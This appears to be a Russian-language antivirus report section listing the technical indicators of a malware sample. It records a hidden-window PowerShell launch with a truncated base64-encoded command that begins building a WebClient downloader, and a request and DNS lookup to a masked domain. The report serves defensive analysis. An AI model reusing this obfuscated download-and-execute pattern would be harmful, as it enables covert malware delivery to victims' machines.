Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAG8AQQBBAFEAQQA9ACgAJwByAHgAVQBBADQAawBHACcAKwAnAF8AJwApADsAJABhAFUAQQB4AEcAdwA0AD0AJgAoACcAbgBlACcAKwAnAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABvAE...
- http://na###breto.band/loq91/10x.php?l=########
- DNS ASK na###breto.band
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAG8AQQBBAFEAQQA9ACgAJwByAHgAVQBBADQAawBHACcAKwAnAF8AJwApADsAJABhAFUAQQB4AEcAdwA0AD0AJgAoACcAbgBlACcAKwAnAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABvAE...' (со скрытым окном)